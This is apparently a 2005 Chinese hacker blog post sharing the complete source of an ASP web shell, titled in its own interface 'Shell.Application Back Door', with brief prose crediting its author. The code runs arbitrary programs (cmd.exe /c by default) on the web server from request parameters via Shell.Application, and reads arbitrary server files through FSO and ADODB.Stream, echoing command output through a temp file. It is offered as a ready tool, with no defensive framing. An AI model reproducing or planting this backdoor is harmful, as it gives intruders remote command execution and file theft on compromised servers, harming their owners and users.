今天Marcos看了我的文章,然后写了个CMDNEW.ASP过来,我偷偷的笑啊...后来我告诉他,Shell.Application也是可以带参数的.于是他说去查查,居然一查就查到~汗~!!!!!而且答案就在msdn上...我汗.当时怎么没想到去那里! 

于是他写了代码,发给大家了(记得PF一下Marcos啊!) 

程序代码： 
<!-- 
    Program: 
        Marcos 
    Thanks: 
        lcx, kEvin1986 
    Date: 
        2005.02.07 
--> 
<% 
’    Option Explicit 
     
    Dim thePath, aspPath, theAct, appPath, appName, appArgs 
     
    theAct = Trim(Request("theAct")) 
    appPath = Trim(Request("appPath")) 
    thePath = Trim(Request("thePath")) 
    appName = Trim(Request("appName")) 
    appArgs = Trim(Request("appArgs")) 
    aspPath = Replace(Server.MapPath(".") & "\~86.tmp", "\\", "\") 
’    aspPath = "c:\winnt\temp\~86.tmp" 

    If theAct = "streamRead" Then 
        Response.Write encode(streamReadFromFile(thePath)) 
        Response.End() 
    End If 

    If theAct = "fsoRead" Then 
        Response.Write encode(fsoReadFromFile(thePath)) 
        Response.End() 
    End If 

    If theAct = "doAct" Then 
        If appName = "" Then 
            appName = "cmd.exe" 
        End If 
     
        If appPath <> "" And Right(appPath, 1) <> "\" Then 
            appPath = appPath & "\" 
        End If 
     
        If appName = "cmd.exe" And appArgs <> "" Then 
            If LCase(Left(appArgs, 2)) <> "/c" Then 
                appArgs = "/c " & appArgs 
            End If 
        Else 
            If appName = "cmd.exe" And appArgs = "" Then 
                appArgs = "/c " 
            End If 
        End If 
         
        sa.ShellExecute appName, appArgs, appPath, "", 0 
    End If 
     
    Rem +--------------------------------------+ 
    Rem |         以下是页面的公共函数部分           | 
    Rem +--------------------------------------+ 
     
    Function streamReadFromFile(thePath) 
        Dim stream 
        On Error Resume Next 
        Set stream = Server.CreateObject("adodb.stream") 
        With stream 
            .Type=2 
            .Mode=3 
            .Open 
            .LoadFromFile thePath 
            chkErr(Err) 
            .Charset="gb2312" 
            .Position=2 
            streamReadFromFile=.ReadText() 
            .Close 
        End With 
        Set stream = Nothing 
    End Function 
     
    Function fsoReadFromFile(thePath) 
        Dim theFile 
        On Error Resume Next 
        Set theFile = fso.OpenTextFile(thePath) 
        chkErr(Err) 
        fsoReadFromFile = theFile.ReadAll() 
        chkErr(Err) 
        theFile.Close 
        Set theFile = Nothing 
    End Function 
     
    Sub chkErr(Err) 
        If Err Then 
            Response.Write "<br/><font size=2>Error: " & Err.Description & "<br/>" 
            Response.Write "<hr>Powered By Marcos 2005.02</font>" 
            Err.Clear 
            Response.End 
        End If 
    End Sub 
     
    Function encode(str) 
        str = Server.HTMLEncode(str) 
        str = Replace(str, vbNewLine, "<br>") 
        str = Replace(str, " ", " ") 
        str = Replace(str, "    ", "    ") 
        encode = str 
    End Function 
%> 
<object runat="server" id="sa" scope="page" classid="clsid:13709620-C279-11CE-A49E-444553540000"></object> 
<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object> 
<style> 
BODY { 
    FONT-SIZE: 9pt; 
    COLOR: #000000; 
    FONT-FAMILY: "Courier New"; 
    scrollbar-face-color:#E4E4F3; 
    scrollbar-highlight-color:#FFFFFF; 
    scrollbar-3dlight-color:#E4E4F3; 
    scrollbar-darkshadow-color:#9C9CD3; 
    scrollbar-shadow-color:#E4E4F3; 
    scrollbar-arrow-color:#4444B3; 
    scrollbar-track-color:#EFEFEF; 
} 
TABLE { 
    FONT-SIZE: 9pt; 
    FONT-FAMILY: "Courier New"; 
    BORDER-COLLAPSE: collapse; 
    border-top-width: 1px; 
    border-right-width: 1px; 
    border-bottom-width: 1px; 
    border-left-width: 1px; 
    border-top-style: solid; 
    border-right-style: none; 
    border-bottom-style: none; 
    border-left-style: solid; 
    border-top-color: #d8d8f0; 
    border-right-color: #d8d8f0; 
    border-bottom-color: #d8d8f0; 
    border-left-color: #d8d8f0; 
} 
.tr { 
    font-family: "Courier New"; 
    font-size: 9pt; 
    background-color: #e4e4f3; 
    text-align: center; 
} 
.td { 
    font-family: "Courier New"; 
    font-size: 9pt; 
    background-color: #f9f9fd; 
} 
input { 
    font-family: "Courier New"; 
    BORDER-TOP-WIDTH: 1px; 
    BORDER-LEFT-WIDTH: 1px; 
    FONT-SIZE: 12px; 
    BORDER-BOTTOM-WIDTH: 1px; 
    BORDER-RIGHT-WIDTH: 1px; 
    color: #000000; 
} 
textarea { 
    font-family: "Courier New"; 
    BORDER-TOP-WIDTH: 1px; 
    BORDER-LEFT-WIDTH: 1px; 
    FONT-SIZE: 12px; 
    BORDER-BOTTOM-WIDTH: 1px; 
    BORDER-RIGHT-WIDTH: 1px; 
    color: #000000; 
} 
A:visited { 
    FONT-SIZE: 9pt;  
    COLOR: #333333;  
    FONT-FAMILY: "Courier New";  
    TEXT-DECORATION: none; 
} 
A:active { 
    FONT-SIZE: 9pt;  
    COLOR: #3366cc;  
    FONT-FAMILY: "Courier New";  
    TEXT-DECORATION: none; 
} 
A:link { 
    FONT-SIZE: 9pt;  
    COLOR: #000000; 
    FONT-FAMILY: "Courier New";  
    TEXT-DECORATION: none; 
} 
A:hover { 
    FONT-SIZE: 9pt;  
    COLOR: #3366cc;  
    FONT-FAMILY: "Courier New";  
    TEXT-DECORATION: none; 
} 
tr { 
    font-family: "Courier New"; 
    font-size: 9pt; 
    line-height: 18px; 
} 
td { 
    font-family: "Courier New"; 
    font-size: 9pt; 
    border-top-width: 1px; 
    border-right-width: 1px; 
    border-bottom-width: 1px; 
    border-left-width: 1px; 
    border-top-style: none; 
    border-right-style: solid; 
    border-bottom-style: solid; 
    border-left-style: none; 
    border-top-color: #d8d8f0; 
    border-right-color: #d8d8f0; 
    border-bottom-color: #d8d8f0; 
    border-left-color: #d8d8f0; 
} 
.trHead { 
    font-family: "Courier New"; 
    font-size: 9pt; 
    background-color: #e4e4f3; 
    line-height: 3px; 
} 
</style> 
<table width="550" border="1" align="center" cellpadding="0" cellspacing="0"> 
  <form method="post" onSubmit="this.Submit.disabled=true;"> 
    <input type="hidden" name="theAct" value="doAct"> 
    <tr>  
      <td colspan="2" class="td"> <%=request.serverVariables("server_name")%>  
        - Shell.Application Back Door</td> 
    </tr> 
    <tr>  
      <td colspan="2" align="right" class="trHead"> </td> 
    </tr> 
    <tr class="td">  
      <td width="17%" align="right">程序路径: </td> 
      <td width="83%"> <input name="appPath" type="text" id="appPath" value="<%=appPath%>" size="50"></td> 
    </tr> 
    <tr class="td">  
      <td align="right">程序文件:</td> 
      <td> <input name="appName" type="text" id="appName" value="<%=appName%>"></td> 
    </tr> 
    <tr class="td">  
      <td align="right">命令参数:</td> 
      <td> <textarea name="appArgs" cols="50" rows="6" id="appArgs"><%=appArgs%></textarea>  
        <input type="button" name="Submit4" value="回显" onClick="this.form.appArgs.value+=’ > ’+this.form.aspPath.value;"></td> 
    </tr> 
    <tr class="td">  
      <td align="right">临时文件:</td> 
      <td> <input name="aspPath" type="text" id="aspPath" value="<%=aspPath%>" size="36">  
        <input type="button" name="Submit2" value="FSO查看" onClick="window.open(’?theAct=fsoRead&thePath=’+this.form.aspPath.value);">  
        <input type="button" name="Submit3" value="Stream查看" onClick="window.open(’?theAct=streamRead&thePath=’+this.form.aspPath.value);"></td> 
    </tr> 
    <tr class="td">  
      <td colspan="2" align="right" class="trHead"> </td> 
    </tr> 
    <tr align="center" class="td">  
      <td colspan="2">  
        <input type="submit" name="Submit" value="偶写好了,提交"> 
        <input type="reset" name="Submit5" value=" 重置 " onclick="location.href=’?’;"> </td> 
    </tr> 
  </form> 
</table> 

哈.真如lcx说的......Marcos编程能力正强啊~~